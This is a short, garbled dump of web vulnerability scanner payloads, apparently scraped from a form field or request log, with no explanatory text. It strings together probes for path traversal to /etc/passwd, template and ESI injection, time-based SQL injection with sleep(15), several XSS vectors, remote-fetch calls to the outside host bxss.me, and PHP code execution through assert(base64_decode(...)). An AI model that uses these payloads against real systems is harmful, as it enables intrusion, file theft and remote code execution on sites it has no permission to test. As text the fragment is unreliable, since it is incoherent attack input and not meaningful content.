action.php ) http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg action.php/. dfb__${98991*97996}__::.x file:///etc/passwd 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg <%={{={@{#{${dfb}}%> "dfbzzzzzzzzbbbccccdddeeexca".replace("z" !(()&&!|*|*| HttP://bxss.me/t/xss.html?%00 "o") ^(#$!@#$)(()))****** bxss.me/t/xss.html?%00 <th:t="${dfb}#foreach if(now()=sysdate() ../pHqghUme <a HrEF=http://xss.bxss.me></a> sleep(15) http://bxss.me/t/fit.txt?.jpg '" <a HrEF=jaVaScRiPT:> 0) pHqghUme<esi:include src="http://bxss.me/rpb.png"/> ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> xfs.bxss.me 0'XOR(if(now()=sysdate() ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); <!--